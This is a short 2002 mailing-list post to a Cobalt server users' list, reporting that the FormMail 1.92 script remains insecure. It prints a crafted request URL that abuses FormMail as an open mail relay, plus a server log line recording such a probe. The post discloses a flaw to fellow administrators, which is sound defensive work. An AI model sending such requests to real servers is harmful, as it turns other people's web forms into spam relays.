[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] formail 1.92 april update still insecure



try this....

http://xx.xxx.xx.xx/cgi-bin/FormMail.pl?recipient=test@xxxxxxxxxxxxxx&subject=Please%20close%20your%20open%20formmail&email=test@xxxxxxxxxxxxxx&=http://xx.xxx.xxx.xxx/cgi-bin/FormMail.pl

server log

www.sample.com 64.xxx.xxx.xxx - - [10/May/2002:17:37:36 -0700] "GET
/cgi-bin/formmail.pl?recipient=openrelayspy@xxxxxxxxxxxxx&subject=please%20close%20your%20open%20formmail&email=openrelayspy1@xxxxxxxxxxxxx&=http://65.xxx.xx.xxx/cgi-bin/formmail.pl
HTTP/1.1" 403 665 "-" "Microsoft URL Control - 6.00.8862"

--
================================
 jb@xxxxxxxxxxxx / www.surfbaud.org / 2002
================================